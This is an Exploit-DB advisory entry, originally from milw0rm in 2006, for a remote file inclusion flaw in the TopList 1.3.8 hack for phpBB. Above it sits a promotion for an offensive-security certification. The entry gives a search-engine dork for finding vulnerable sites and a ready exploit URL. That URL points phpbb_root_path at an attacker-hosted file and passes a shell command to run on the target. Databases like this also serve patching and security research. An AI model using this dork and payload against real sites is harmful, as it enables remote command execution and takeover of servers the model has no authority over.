TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)

EDB-ID:

1722


Author:

[Oo]

Type:

webapps


Platform:

PHP

Date:

2006-04-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
URL: http://www.phpbb2hacks.de/toplist-df148.html
Dork: inurl:"toplist.php" "powered by phpbb"
Credits: [Oo]

Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-27]